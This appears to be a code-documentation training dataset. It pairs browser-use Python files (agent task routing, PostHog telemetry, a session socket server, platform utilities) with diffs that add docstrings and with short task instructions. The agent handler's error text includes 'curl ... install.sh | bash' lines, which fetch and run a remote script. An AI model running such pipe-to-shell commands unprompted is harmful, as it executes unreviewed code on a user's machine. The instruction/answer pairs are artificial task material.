logger = logging.getLogger(__name__)
# Cloud-only flags that only work in remote mode
CLOUD_ONLY_FLAGS = [
'session_id',
'proxy_country',
'wait',
'stream',
'flash',
'keep_alive',
'thinking',
'start_url',
'metadata',
'secret',
'allowed_domain',
'skill_id',
'structured_output',
'judge',
'judge_ground_truth',
]
async def handle(session: SessionInfo, params: dict[str, Any]) -> Any:
task = params.get('task')
if not task:
return {'success': False, 'error': 'No task provided'}
# Route based on browser mode
if session.browser_mode == 'remote':
# Remote mode requires Browser-Use API key
try:
require_api_key('Cloud agent tasks')
except APIKeyRequired as e:
return {'success': False, 'error': str(e)}
return await _handle_cloud_task(params)
else:
# Check if user tried to use cloud-only flags in local mode
used_cloud_flags = [f for f in CLOUD_ONLY_FLAGS if params.get(f)]
if used_cloud_flags:
from browser_use.skill_cli.install_config import is_mode_available
flags_str = ', '.join(f'--{f.replace("_", "-")}' for f in used_cloud_flags)
if is_mode_available('remote'):
# Remote is available, user just needs to use it
return {
'success': False,
'error': f'Cloud-only flags used in local mode: {flags_str}\nUse --browser remote to enable cloud features.',
}
else:
# Remote not installed (--local-only install)
return {
'success': False,
'error': f'Cloud-only flags require remote mode: {flags_str}\n'
f'Remote mode is not installed. Reinstall to enable:\n'
f' curl -fsSL https://browser-use.com/cli/install.sh | bash -s -- --remote-only\n'
f' curl -fsSL https://browser-use.com/cli/install.sh | bash -s -- --full',
}
return await _handle_local_task(session, params)
async def _handle_cloud_task(params: dict[str, Any]) -> Any:
from browser_use.skill_cli.commands import cloud_session, cloud_task
task = params['task']
# Handle vision flag (--vision vs --no-vision)
vision: bool | None = None
if params.get('vision'):
vision = True
elif params.get('no_vision'):
vision = False
# Parse key=value list params
metadata = _parse_key_value_list(params.get('metadata'))
secrets = _parse_key_value_list(params.get('secret'))
# Build session params - only include what user explicitly set
session_id = params.get('session_id')
profile_id = params.get('profile')
proxy_country = params.get('proxy_country')
try:
logger.info(f'Creating cloud task: {task}')
# Create session first if profile or proxy specified and no session_id
if (profile_id or proxy_country) and not session_id:
session = cloud_session.create_session(
profile_id=profile_id,
proxy_country=proxy_country,
keep_alive=params.get('keep_alive'),
)
session_id = session.id
logger.info(f'Created cloud session: {session_id}')
# Create cloud task - only pass what user explicitly set
task_response = cloud_task.create_task(
task=task,
llm=params.get('llm'),
session_id=session_id,
max_steps=params.get('max_steps'),
flash_mode=params.get('flash'),
thinking=params.get('thinking'),
vision=vision,
start_url=params.get('start_url'),
metadata=metadata,
secrets=secrets,
allowed_domains=params.get('allowed_domain'),
skill_ids=params.get('skill_id'),
structured_output=params.get('structured_output'),
judge=params.get('judge'),
judge_ground_truth=params.get('judge_ground_truth'),
)
task_id = task_response.id
response_session_id = task_response.session_id
if not task_id:
return {
'success': False,
'error': 'Cloud API did not return a task ID',
'task': task,
}
logger.info(f'Cloud task created: {task_id}')
# Return immediately unless --wait is specified
if not params.get('wait'):
return {
'success': True,
'task_id': task_id,
'session_id': response_session_id,
'message': 'Task started. Use "browser-use task status <task_id>" to check progress.',
}
# Poll until complete
logger.info('Waiting for task completion...')
result = await cloud_task.poll_until_complete(task_id, stream=params.get('stream', False))
return {
'success': True,
'task': task,
'task_id': task_id,
'session_id': response_session_id,
'status': result.status,
'output': result.output,
'cost': result.cost,
'done': result.status == 'finished',
}
except Exception as e:
logger.exception(f'Cloud task failed: {e}')
return {
'success': False,
'error': str(e),
'task': task,
}
def _parse_key_value_list(items: list[str] | None) -> dict[str, str | None] | None:
if not items:
return None
result: dict[str, str | None] = {}
for item in items:
if '=' in item:
key, value = item.split('=', 1)
result[key] = value
return result if result else None
async def _handle_local_task(session: SessionInfo, params: dict[str, Any]) -> Any:
task = params['task']
max_steps = params.get('max_steps')
model = params.get('llm') # Optional model override
try:
# Import agent and LLM
from browser_use.agent.service import Agent
# Try to get LLM from environment (with optional model override)
llm = get_llm(model=model)
if llm is None:
if model:
return {
'success': False,
'error': f'Could not initialize model "{model}". '
f'Make sure the appropriate API key is set (OPENAI_API_KEY, ANTHROPIC_API_KEY, or GOOGLE_API_KEY).',
}
return {
'success': False,
'error': 'No LLM configured. Set BROWSER_USE_API_KEY, OPENAI_API_KEY, ANTHROPIC_API_KEY, or GOOGLE_API_KEY',
}
# Create and run agent
agent = Agent(
task=task,
llm=llm,
browser_session=session.browser_session,
)
logger.info(f'Running local agent task: {task}')
run_kwargs = {}
if max_steps is not None:
run_kwargs['max_steps'] = max_steps
result = await agent.run(**run_kwargs)
# Extract result info
final_result = result.final_result() if result else None
return {
'success': True,
'task': task,
'steps': len(result) if result else 0,
'result': str(final_result) if final_result else None,
'done': result.is_done() if result else False,
}
except Exception as e:
logger.exception(f'Local agent task failed: {e}')
return {
'success': False,
'error': str(e),
'task': task,
}
def _get_verified_models() -> dict[str, set[str]]:
import typing
from anthropic.types.model_param import ModelParam
from openai.types.shared.chat_model import ChatModel
from browser_use.llm.google.chat import VerifiedGeminiModels
# OpenAI: ChatModel is a Literal type
openai_models = set(typing.get_args(ChatModel))
# Anthropic: ModelParam is Union[Literal[...], str] - extract the Literal
anthropic_literal = typing.get_args(ModelParam)[0]
anthropic_models = set(typing.get_args(anthropic_literal))
# Google: VerifiedGeminiModels Literal
google_models = set(typing.get_args(VerifiedGeminiModels))
# Browser-Use: cloud models
browser_use_models = {'bu-latest', 'bu-1-0', 'bu-2-0'}
return {
'openai': openai_models,
'anthropic': anthropic_models,
'google': google_models,
'browser-use': browser_use_models,
}
_VERIFIED_MODELS: dict[str, set[str]] | None = None
def _get_provider_for_model(model: str) -> str | None:
global _VERIFIED_MODELS
if _VERIFIED_MODELS is None:
_VERIFIED_MODELS = _get_verified_models()
for provider, models in _VERIFIED_MODELS.items():
if model in models:
return provider
return None
def get_llm(model: str | None = None) -> Any:
from browser_use.llm import ChatAnthropic, ChatBrowserUse, ChatGoogle, ChatOpenAI
if model:
provider = _get_provider_for_model(model)
if provider == 'openai':
return ChatOpenAI(model=model)
elif provider == 'anthropic':
return ChatAnthropic(model=model)
elif provider == 'google':
return ChatGoogle(model=model)
elif provider == 'browser-use':
return ChatBrowserUse(model=model)
else:
logger.warning(f'Unknown model: {model}. Not in any verified model list.')
return None
# No model specified - auto-detect from available API keys
if os.environ.get('BROWSER_USE_API_KEY'):
return ChatBrowserUse()
if os.environ.get('OPENAI_API_KEY'):
return ChatOpenAI(model='o3')
if os.environ.get('ANTHROPIC_API_KEY'):
return ChatAnthropic(model='claude-sonnet-4-0')
if os.environ.get('GOOGLE_API_KEY'):
return ChatGoogle(model='gemini-flash-latest')
return None | --- +++ @@ -1,3 +1,4 @@+"""Agent task command handler."""
import logging
import os
@@ -29,6 +30,12 @@
async def handle(session: SessionInfo, params: dict[str, Any]) -> Any:
+ """Handle agent run command.
+
+ Routes based on browser mode:
+ - Remote mode (--browser remote): Uses Cloud API with US proxy by default
+ - Local mode (default): Uses local browser-use agent
+ """
task = params.get('task')
if not task:
return {'success': False, 'error': 'No task provided'}
@@ -68,6 +75,10 @@
async def _handle_cloud_task(params: dict[str, Any]) -> Any:
+ """Handle task execution via Cloud API.
+
+ By default uses US proxy for all cloud tasks.
+ """
from browser_use.skill_cli.commands import cloud_session, cloud_task
task = params['task']
@@ -166,6 +177,7 @@
def _parse_key_value_list(items: list[str] | None) -> dict[str, str | None] | None:
+ """Parse a list of 'key=value' strings into a dict."""
if not items:
return None
result: dict[str, str | None] = {}
@@ -177,6 +189,7 @@
async def _handle_local_task(session: SessionInfo, params: dict[str, Any]) -> Any:
+ """Handle task execution locally with browser-use agent."""
task = params['task']
max_steps = params.get('max_steps')
model = params.get('llm') # Optional model override
@@ -233,6 +246,7 @@
def _get_verified_models() -> dict[str, set[str]]:
+ """Extract verified model names from SDK sources of truth."""
import typing
from anthropic.types.model_param import ModelParam
@@ -265,6 +279,7 @@
def _get_provider_for_model(model: str) -> str | None:
+ """Determine the provider by checking SDK verified model lists."""
global _VERIFIED_MODELS
if _VERIFIED_MODELS is None:
_VERIFIED_MODELS = _get_verified_models()
@@ -277,6 +292,16 @@
def get_llm(model: str | None = None) -> Any:
+ """Get LLM instance from environment configuration.
+
+ Args:
+ model: Optional model name to use. If provided, will instantiate
+ the appropriate provider for that model. If not provided,
+ auto-detects from available API keys.
+
+ Supported providers: OpenAI, Anthropic, Google, Browser-Use.
+ Model names are validated against each SDK's verified model list.
+ """
from browser_use.llm import ChatAnthropic, ChatBrowserUse, ChatGoogle, ChatOpenAI
if model:
@@ -307,4 +332,4 @@ if os.environ.get('GOOGLE_API_KEY'):
return ChatGoogle(model='gemini-flash-latest')
- return None+ return None
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/skill_cli/commands/agent.py |
Add docstrings with type hints explained | import logging
import os
from dotenv import load_dotenv
from posthog import Posthog
from uuid_extensions import uuid7str
from browser_use.telemetry.views import BaseTelemetryEvent
from browser_use.utils import singleton
load_dotenv()
from browser_use.config import CONFIG
logger = logging.getLogger(__name__)
POSTHOG_EVENT_SETTINGS = {
'process_person_profile': True,
}
@singleton
class ProductTelemetry:
USER_ID_PATH = str(CONFIG.BROWSER_USE_CONFIG_DIR / 'device_id')
PROJECT_API_KEY = 'phc_F8JMNjW1i2KbGUTaW1unnDdLSPCoyc52SGRU0JecaUh'
HOST = 'https://eu.i.posthog.com'
UNKNOWN_USER_ID = 'UNKNOWN'
_curr_user_id = None
def __init__(self) -> None:
telemetry_disabled = not CONFIG.ANONYMIZED_TELEMETRY
self.debug_logging = CONFIG.BROWSER_USE_LOGGING_LEVEL == 'debug'
if telemetry_disabled:
self._posthog_client = None
else:
logger.info('Using anonymized telemetry, see https://docs.browser-use.com/development/monitoring/telemetry.')
self._posthog_client = Posthog(
project_api_key=self.PROJECT_API_KEY,
host=self.HOST,
disable_geoip=False,
enable_exception_autocapture=True,
)
# Silence posthog's logging
if not self.debug_logging:
posthog_logger = logging.getLogger('posthog')
posthog_logger.disabled = True
if self._posthog_client is None:
logger.debug('Telemetry disabled')
def capture(self, event: BaseTelemetryEvent) -> None:
if self._posthog_client is None:
return
self._direct_capture(event)
def _direct_capture(self, event: BaseTelemetryEvent) -> None:
if self._posthog_client is None:
return
try:
self._posthog_client.capture(
distinct_id=self.user_id,
event=event.name,
properties={**event.properties, **POSTHOG_EVENT_SETTINGS},
)
except Exception as e:
logger.error(f'Failed to send telemetry event {event.name}: {e}')
def flush(self) -> None:
if self._posthog_client:
try:
self._posthog_client.flush()
logger.debug('PostHog client telemetry queue flushed.')
except Exception as e:
logger.error(f'Failed to flush PostHog client: {e}')
else:
logger.debug('PostHog client not available, skipping flush.')
@property
def user_id(self) -> str:
if self._curr_user_id:
return self._curr_user_id
# File access may fail due to permissions or other reasons. We don't want to
# crash so we catch all exceptions.
try:
if not os.path.exists(self.USER_ID_PATH):
os.makedirs(os.path.dirname(self.USER_ID_PATH), exist_ok=True)
with open(self.USER_ID_PATH, 'w') as f:
new_user_id = uuid7str()
f.write(new_user_id)
self._curr_user_id = new_user_id
else:
with open(self.USER_ID_PATH) as f:
self._curr_user_id = f.read()
except Exception:
self._curr_user_id = 'UNKNOWN_USER_ID'
return self._curr_user_id | --- +++ @@ -22,6 +22,11 @@
@singleton
class ProductTelemetry:
+ """
+ Service for capturing anonymized telemetry data.
+
+ If the environment variable `ANONYMIZED_TELEMETRY=False`, anonymized telemetry will be disabled.
+ """
USER_ID_PATH = str(CONFIG.BROWSER_USE_CONFIG_DIR / 'device_id')
PROJECT_API_KEY = 'phc_F8JMNjW1i2KbGUTaW1unnDdLSPCoyc52SGRU0JecaUh'
@@ -60,6 +65,9 @@ self._direct_capture(event)
def _direct_capture(self, event: BaseTelemetryEvent) -> None:
+ """
+ Should not be thread blocking because posthog magically handles it
+ """
if self._posthog_client is None:
return
@@ -101,4 +109,4 @@ self._curr_user_id = f.read()
except Exception:
self._curr_user_id = 'UNKNOWN_USER_ID'
- return self._curr_user_id+ return self._curr_user_id
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/telemetry/service.py |
Add docstrings for better understanding |
import argparse
import asyncio
import json
import logging
import os
import signal
import sys
from pathlib import Path
from typing import IO
import portalocker
# Configure logging before imports
logging.basicConfig(
level=logging.INFO,
format='%(asctime)s [%(levelname)s] %(name)s: %(message)s',
handlers=[logging.StreamHandler()],
)
logger = logging.getLogger('browser_use.skill_cli.server')
class SessionServer:
def __init__(
self,
session_name: str,
browser_mode: str,
headed: bool,
profile: str | None,
) -> None:
self.session_name = session_name
self.browser_mode = browser_mode
self.headed = headed
self.profile = profile
self.running = True
self._server: asyncio.Server | None = None
self._shutdown_event: asyncio.Event | None = None
self._lock_file: IO | None = None
# Lazy import to avoid loading everything at startup
from browser_use.skill_cli.sessions import SessionRegistry
self.registry = SessionRegistry()
async def handle_connection(
self,
reader: asyncio.StreamReader,
writer: asyncio.StreamWriter,
) -> None:
addr = writer.get_extra_info('peername')
logger.debug(f'Connection from {addr}')
try:
while self.running:
try:
line = await asyncio.wait_for(reader.readline(), timeout=300) # 5 min timeout
except TimeoutError:
logger.debug(f'Connection timeout from {addr}')
break
if not line:
break
request = {}
try:
request = json.loads(line.decode())
response = await self.dispatch(request)
except json.JSONDecodeError as e:
response = {'id': '', 'success': False, 'error': f'Invalid JSON: {e}'}
except Exception as e:
logger.exception(f'Error handling request: {e}')
response = {'id': '', 'success': False, 'error': str(e)}
writer.write((json.dumps(response) + '\n').encode())
await writer.drain()
# Check for shutdown command
if request.get('action') == 'shutdown':
await self.shutdown()
break
except Exception as e:
logger.exception(f'Connection error: {e}')
finally:
writer.close()
try:
await writer.wait_closed()
except Exception:
pass
async def dispatch(self, request: dict) -> dict:
action = request.get('action', '')
params = request.get('params', {})
req_id = request.get('id', '')
logger.info(f'Dispatch: {action} (id={req_id})')
try:
# Import command handlers
from browser_use.skill_cli.commands import agent, browser, python_exec, session
# Handle shutdown
if action == 'shutdown':
return {'id': req_id, 'success': True, 'data': {'shutdown': True}}
# Session commands don't need a browser session
if action in session.COMMANDS:
result = await session.handle(action, self.session_name, self.registry, params)
# Check if command wants to shutdown server
if result.get('_shutdown'):
asyncio.create_task(self.shutdown())
return {'id': req_id, 'success': True, 'data': result}
# Get or create session for browser commands
session_info = await self.registry.get_or_create(
self.session_name,
self.browser_mode,
self.headed,
self.profile,
)
# Dispatch to handler
if action in browser.COMMANDS:
result = await browser.handle(action, session_info, params)
elif action == 'python':
result = await python_exec.handle(session_info, params)
elif action == 'run':
result = await agent.handle(session_info, params)
else:
return {'id': req_id, 'success': False, 'error': f'Unknown action: {action}'}
return {'id': req_id, 'success': True, 'data': result}
except Exception as e:
logger.exception(f'Error dispatching {action}: {e}')
return {'id': req_id, 'success': False, 'error': str(e)}
async def shutdown(self) -> None:
logger.info('Shutting down server...')
self.running = False
# Signal the shutdown event
if self._shutdown_event:
self._shutdown_event.set()
# Close all sessions
await self.registry.close_all()
# Stop the server
if self._server:
self._server.close()
await self._server.wait_closed()
# Clean up files
from browser_use.skill_cli.utils import cleanup_session_files
cleanup_session_files(self.session_name)
async def run(self) -> None:
from browser_use.skill_cli.utils import get_lock_path, get_pid_path, get_socket_path
# Acquire exclusive lock BEFORE writing PID - this prevents race conditions
lock_path = get_lock_path(self.session_name)
lock_path.parent.mkdir(parents=True, exist_ok=True)
lock_path.touch(exist_ok=True)
self._lock_file = open(lock_path, 'r+') # noqa: ASYNC230 - blocking ok at startup
try:
portalocker.lock(self._lock_file, portalocker.LOCK_EX | portalocker.LOCK_NB)
except portalocker.LockException:
logger.error(f'Another server is already running for session: {self.session_name}')
self._lock_file.close()
self._lock_file = None
sys.exit(1)
logger.info(f'Acquired exclusive lock for session: {self.session_name}')
# NOW safe to write PID file
pid_path = get_pid_path(self.session_name)
pid_path.write_text(str(os.getpid()))
logger.info(f'PID file: {pid_path}')
# Setup signal handlers
loop = asyncio.get_running_loop()
def signal_handler():
asyncio.create_task(self.shutdown())
for sig in (signal.SIGINT, signal.SIGTERM):
try:
loop.add_signal_handler(sig, signal_handler)
except NotImplementedError:
# Windows doesn't support add_signal_handler
pass
# Also handle SIGHUP on Unix
if hasattr(signal, 'SIGHUP'):
try:
loop.add_signal_handler(signal.SIGHUP, signal_handler)
except NotImplementedError:
pass
# Get socket path
sock_path = get_socket_path(self.session_name)
logger.info(f'Socket: {sock_path}')
# Start server
if sock_path.startswith('tcp://'):
# Windows: TCP server
_, hostport = sock_path.split('://', 1)
host, port = hostport.split(':')
self._server = await asyncio.start_server(
self.handle_connection,
host,
int(port),
reuse_address=True, # Allow rebinding ports in TIME_WAIT state
)
logger.info(f'Listening on TCP {host}:{port}')
else:
# Unix: socket server
# Remove stale socket file
sock_file = Path(sock_path)
if sock_file.exists():
sock_file.unlink()
self._server = await asyncio.start_unix_server(
self.handle_connection,
sock_path,
)
logger.info(f'Listening on Unix socket {sock_path}')
# Run until shutdown
self._shutdown_event = asyncio.Event()
try:
async with self._server:
await self._shutdown_event.wait()
except asyncio.CancelledError:
pass
finally:
# Release lock on shutdown
if self._lock_file:
try:
portalocker.unlock(self._lock_file)
self._lock_file.close()
except Exception:
pass
self._lock_file = None
logger.info('Server stopped')
def main() -> None:
parser = argparse.ArgumentParser(description='Browser-use session server')
parser.add_argument('--session', required=True, help='Session name')
parser.add_argument('--browser', default='chromium', choices=['chromium', 'real', 'remote'])
parser.add_argument('--headed', action='store_true', help='Show browser window')
parser.add_argument('--profile', help='Chrome profile (real browser mode)')
args = parser.parse_args()
logger.info(f'Starting server for session: {args.session}')
logger.info(f'Browser mode: {args.browser}, headed: {args.headed}')
server = SessionServer(
session_name=args.session,
browser_mode=args.browser,
headed=args.headed,
profile=args.profile,
)
try:
asyncio.run(server.run())
except KeyboardInterrupt:
logger.info('Interrupted')
except Exception as e:
logger.exception(f'Server error: {e}')
sys.exit(1)
if __name__ == '__main__':
main() | --- +++ @@ -1,3 +1,9 @@+"""Session server - keeps BrowserSession instances alive.
+
+This server runs as a background process, managing browser sessions and
+handling commands from the CLI. It uses Unix sockets (or TCP on Windows)
+for IPC communication.
+"""
import argparse
import asyncio
@@ -21,6 +27,7 @@
class SessionServer:
+ """Server that manages browser sessions and handles CLI commands."""
def __init__(
self,
@@ -48,6 +55,7 @@ reader: asyncio.StreamReader,
writer: asyncio.StreamWriter,
) -> None:
+ """Handle a client connection."""
addr = writer.get_extra_info('peername')
logger.debug(f'Connection from {addr}')
@@ -90,6 +98,7 @@ pass
async def dispatch(self, request: dict) -> dict:
+ """Dispatch command to appropriate handler."""
action = request.get('action', '')
params = request.get('params', {})
req_id = request.get('id', '')
@@ -137,6 +146,7 @@ return {'id': req_id, 'success': False, 'error': str(e)}
async def shutdown(self) -> None:
+ """Graceful shutdown."""
logger.info('Shutting down server...')
self.running = False
@@ -158,6 +168,7 @@ cleanup_session_files(self.session_name)
async def run(self) -> None:
+ """Run the server."""
from browser_use.skill_cli.utils import get_lock_path, get_pid_path, get_socket_path
# Acquire exclusive lock BEFORE writing PID - this prevents race conditions
@@ -250,6 +261,7 @@
def main() -> None:
+ """Main entry point for server process."""
parser = argparse.ArgumentParser(description='Browser-use session server')
parser.add_argument('--session', required=True, help='Session name')
parser.add_argument('--browser', default='chromium', choices=['chromium', 'real', 'remote'])
@@ -277,4 +289,4 @@
if __name__ == '__main__':
- main()+ main()
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/skill_cli/server.py |
Create docstrings for reusable components |
import hashlib
import os
import platform
import signal
import subprocess
import sys
import tempfile
from pathlib import Path
from typing import IO
import portalocker
def get_socket_path(session: str) -> str:
if sys.platform == 'win32':
# Windows: use TCP on deterministic port (49152-65535)
# Use 127.0.0.1 explicitly (not localhost) to avoid IPv6 binding issues
port = 49152 + (int(hashlib.md5(session.encode()).hexdigest()[:4], 16) % 16383)
return f'tcp://127.0.0.1:{port}'
return str(Path(tempfile.gettempdir()) / f'browser-use-{session}.sock')
def get_pid_path(session: str) -> Path:
return Path(tempfile.gettempdir()) / f'browser-use-{session}.pid'
def get_log_path(session: str) -> Path:
return Path(tempfile.gettempdir()) / f'browser-use-{session}.log'
def get_lock_path(session: str) -> Path:
return Path(tempfile.gettempdir()) / f'browser-use-{session}.lock'
def _pid_exists(pid: int) -> bool:
if sys.platform == 'win32':
import ctypes
PROCESS_QUERY_LIMITED_INFORMATION = 0x1000
handle = ctypes.windll.kernel32.OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, False, pid)
if handle:
ctypes.windll.kernel32.CloseHandle(handle)
return True
return False
else:
try:
os.kill(pid, 0)
return True
except OSError:
return False
def is_server_running(session: str) -> bool:
pid_path = get_pid_path(session)
if not pid_path.exists():
return False
try:
pid = int(pid_path.read_text().strip())
return _pid_exists(pid)
except (OSError, ValueError):
# Can't read PID file or invalid PID
return False
def try_acquire_server_lock(session: str) -> IO | None:
lock_path = get_lock_path(session)
lock_path.parent.mkdir(parents=True, exist_ok=True)
lock_path.touch(exist_ok=True)
lock_file = open(lock_path, 'r+')
try:
portalocker.lock(lock_file, portalocker.LOCK_EX | portalocker.LOCK_NB)
return lock_file
except portalocker.LockException:
lock_file.close()
return None
def is_session_locked(session: str) -> bool:
lock_path = get_lock_path(session)
if not lock_path.exists():
return False
try:
with open(lock_path, 'r+') as f:
portalocker.lock(f, portalocker.LOCK_EX | portalocker.LOCK_NB)
portalocker.unlock(f)
return False # Lock acquired = no one holding it
except portalocker.LockException:
return True # Lock failed = someone holding it
except OSError:
return False # File access error
def kill_orphaned_server(session: str) -> bool:
pid_path = get_pid_path(session)
if not pid_path.exists():
return False
# Check if session is locked (server alive and holding lock)
if is_session_locked(session):
return False # Not an orphan - server is healthy
# PID exists but no lock - orphan situation
try:
pid = int(pid_path.read_text().strip())
if _pid_exists(pid):
# Kill the orphaned process
if sys.platform == 'win32':
import ctypes
PROCESS_TERMINATE = 1
handle = ctypes.windll.kernel32.OpenProcess(PROCESS_TERMINATE, False, pid)
if handle:
ctypes.windll.kernel32.TerminateProcess(handle, 1)
ctypes.windll.kernel32.CloseHandle(handle)
else:
os.kill(pid, signal.SIGKILL)
return True
except (OSError, ValueError):
pass
# Clean up stale files even if we couldn't kill (process may be gone)
cleanup_session_files(session)
return False
def find_all_sessions() -> list[str]:
sessions = []
tmpdir = Path(tempfile.gettempdir())
for pid_file in tmpdir.glob('browser-use-*.pid'):
# Extract session name from filename: browser-use-{session}.pid
name = pid_file.stem.replace('browser-use-', '', 1)
if is_server_running(name):
sessions.append(name)
return sessions
def cleanup_session_files(session: str) -> None:
sock_path = get_socket_path(session)
pid_path = get_pid_path(session)
lock_path = get_lock_path(session)
meta_path = Path(tempfile.gettempdir()) / f'browser-use-{session}.meta'
# Remove socket file (Unix only)
if not sock_path.startswith('tcp://'):
try:
os.unlink(sock_path)
except OSError:
pass
# Remove PID file
try:
pid_path.unlink()
except OSError:
pass
# Remove lock file
try:
lock_path.unlink()
except OSError:
pass
# Remove metadata file
try:
meta_path.unlink()
except OSError:
pass
def find_chrome_executable() -> str | None:
system = platform.system()
if system == 'Darwin':
# macOS
paths = [
'/Applications/Google Chrome.app/Contents/MacOS/Google Chrome',
'/Applications/Chromium.app/Contents/MacOS/Chromium',
'/Applications/Google Chrome Canary.app/Contents/MacOS/Google Chrome Canary',
]
for path in paths:
if os.path.exists(path):
return path
elif system == 'Linux':
# Linux: try common commands
for cmd in ['google-chrome', 'google-chrome-stable', 'chromium', 'chromium-browser']:
try:
result = subprocess.run(['which', cmd], capture_output=True, text=True)
if result.returncode == 0:
return result.stdout.strip()
except Exception:
pass
elif system == 'Windows':
# Windows: check common paths
paths = [
os.path.expandvars(r'%ProgramFiles%\Google\Chrome\Application\chrome.exe'),
os.path.expandvars(r'%ProgramFiles(x86)%\Google\Chrome\Application\chrome.exe'),
os.path.expandvars(r'%LocalAppData%\Google\Chrome\Application\chrome.exe'),
]
for path in paths:
if os.path.exists(path):
return path
return None
def get_chrome_profile_path(profile: str | None) -> str | None:
if profile is None:
# Use default Chrome profile location
system = platform.system()
if system == 'Darwin':
return str(Path.home() / 'Library' / 'Application Support' / 'Google' / 'Chrome')
elif system == 'Linux':
return str(Path.home() / '.config' / 'google-chrome')
elif system == 'Windows':
return os.path.expandvars(r'%LocalAppData%\Google\Chrome\User Data')
else:
# Return the profile name - Chrome will use it as a subdirectory
# The actual path will be user_data_dir/profile
return profile
return None
def list_chrome_profiles() -> list[dict[str, str]]:
import json
user_data_dir = get_chrome_profile_path(None)
if user_data_dir is None:
return []
local_state_path = Path(user_data_dir) / 'Local State'
if not local_state_path.exists():
return []
try:
with open(local_state_path) as f:
local_state = json.load(f)
info_cache = local_state.get('profile', {}).get('info_cache', {})
profiles = []
for directory, info in info_cache.items():
profiles.append(
{
'directory': directory,
'name': info.get('name', directory),
}
)
return sorted(profiles, key=lambda p: p['directory'])
except (json.JSONDecodeError, KeyError, OSError):
return []
def get_config_dir() -> Path:
if sys.platform == 'win32':
base = Path(os.environ.get('APPDATA', Path.home()))
else:
base = Path(os.environ.get('XDG_CONFIG_HOME', Path.home() / '.config'))
return base / 'browser-use'
def get_config_path() -> Path:
return get_config_dir() / 'config.json' | --- +++ @@ -1,3 +1,4 @@+"""Platform utilities for CLI and server."""
import hashlib
import os
@@ -13,6 +14,11 @@
def get_socket_path(session: str) -> str:
+ """Get socket path for session.
+
+ On Windows, returns a TCP address (tcp://127.0.0.1:PORT).
+ On Unix, returns a Unix socket path.
+ """
if sys.platform == 'win32':
# Windows: use TCP on deterministic port (49152-65535)
# Use 127.0.0.1 explicitly (not localhost) to avoid IPv6 binding issues
@@ -22,18 +28,26 @@
def get_pid_path(session: str) -> Path:
+ """Get PID file path for session."""
return Path(tempfile.gettempdir()) / f'browser-use-{session}.pid'
def get_log_path(session: str) -> Path:
+ """Get log file path for session."""
return Path(tempfile.gettempdir()) / f'browser-use-{session}.log'
def get_lock_path(session: str) -> Path:
+ """Get lock file path for session."""
return Path(tempfile.gettempdir()) / f'browser-use-{session}.lock'
def _pid_exists(pid: int) -> bool:
+ """Check if a process with given PID exists.
+
+ On Windows, uses ctypes to call OpenProcess (os.kill doesn't work reliably).
+ On Unix, uses os.kill(pid, 0) which is the standard approach.
+ """
if sys.platform == 'win32':
import ctypes
@@ -52,6 +66,7 @@
def is_server_running(session: str) -> bool:
+ """Check if server is running for session."""
pid_path = get_pid_path(session)
if not pid_path.exists():
return False
@@ -64,6 +79,12 @@
def try_acquire_server_lock(session: str) -> IO | None:
+ """Try to acquire the server lock non-blocking.
+
+ Returns:
+ Lock file handle if acquired (caller must keep in scope to maintain lock),
+ None if lock is already held by another process.
+ """
lock_path = get_lock_path(session)
lock_path.parent.mkdir(parents=True, exist_ok=True)
lock_path.touch(exist_ok=True)
@@ -78,6 +99,7 @@
def is_session_locked(session: str) -> bool:
+ """Check if session has an active lock (server is holding it)."""
lock_path = get_lock_path(session)
if not lock_path.exists():
return False
@@ -94,6 +116,15 @@
def kill_orphaned_server(session: str) -> bool:
+ """Kill an orphaned server (has PID file but no lock).
+
+ An orphaned server is one where the process is running but it doesn't
+ hold the session lock (e.g., because a newer server took over the lock
+ file but didn't kill the old process).
+
+ Returns:
+ True if an orphan was found and killed.
+ """
pid_path = get_pid_path(session)
if not pid_path.exists():
return False
@@ -127,6 +158,7 @@
def find_all_sessions() -> list[str]:
+ """Find all running browser-use sessions by scanning PID files."""
sessions = []
tmpdir = Path(tempfile.gettempdir())
for pid_file in tmpdir.glob('browser-use-*.pid'):
@@ -138,6 +170,7 @@
def cleanup_session_files(session: str) -> None:
+ """Remove session socket, PID, lock, and metadata files."""
sock_path = get_socket_path(session)
pid_path = get_pid_path(session)
lock_path = get_lock_path(session)
@@ -170,6 +203,7 @@
def find_chrome_executable() -> str | None:
+ """Find Chrome/Chromium executable on the system."""
system = platform.system()
if system == 'Darwin':
@@ -208,6 +242,10 @@
def get_chrome_profile_path(profile: str | None) -> str | None:
+ """Get Chrome user data directory for a profile.
+
+ If profile is None, returns the default Chrome user data directory.
+ """
if profile is None:
# Use default Chrome profile location
system = platform.system()
@@ -226,6 +264,12 @@
def list_chrome_profiles() -> list[dict[str, str]]:
+ """List available Chrome profiles with their names.
+
+ Returns:
+ List of dicts with 'directory' and 'name' keys, ex:
+ [{'directory': 'Default', 'name': 'Person 1'}, {'directory': 'Profile 1', 'name': 'Work'}]
+ """
import json
user_data_dir = get_chrome_profile_path(None)
@@ -255,6 +299,7 @@
def get_config_dir() -> Path:
+ """Get browser-use config directory."""
if sys.platform == 'win32':
base = Path(os.environ.get('APPDATA', Path.home()))
else:
@@ -263,4 +308,5 @@
def get_config_path() -> Path:
- return get_config_dir() / 'config.json'+ """Get browser-use config file path."""
+ return get_config_dir() / 'config.json'
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/skill_cli/utils.py |
Document my Python code with docstrings |
import json
import hashlib
import os
import tempfile
import zipfile
import shutil
import copy
from dataclasses import dataclass
from pathlib import Path
from typing import Optional, Dict, List, Any, Callable, Set
from datetime import datetime, timezone
import re
import pathspec
import yaml
from packaging import version as pkg_version
from packaging.specifiers import SpecifierSet, InvalidSpecifier
class ExtensionError(Exception):
pass
class ValidationError(ExtensionError):
pass
class CompatibilityError(ExtensionError):
pass
def normalize_priority(value: Any, default: int = 10) -> int:
try:
priority = int(value)
except (TypeError, ValueError):
return default
return priority if priority >= 1 else default
@dataclass
class CatalogEntry:
url: str
name: str
priority: int
install_allowed: bool
description: str = ""
class ExtensionManifest:
SCHEMA_VERSION = "1.0"
REQUIRED_FIELDS = ["schema_version", "extension", "requires", "provides"]
def __init__(self, manifest_path: Path):
self.path = manifest_path
self.data = self._load_yaml(manifest_path)
self._validate()
def _load_yaml(self, path: Path) -> dict:
try:
with open(path, 'r') as f:
return yaml.safe_load(f) or {}
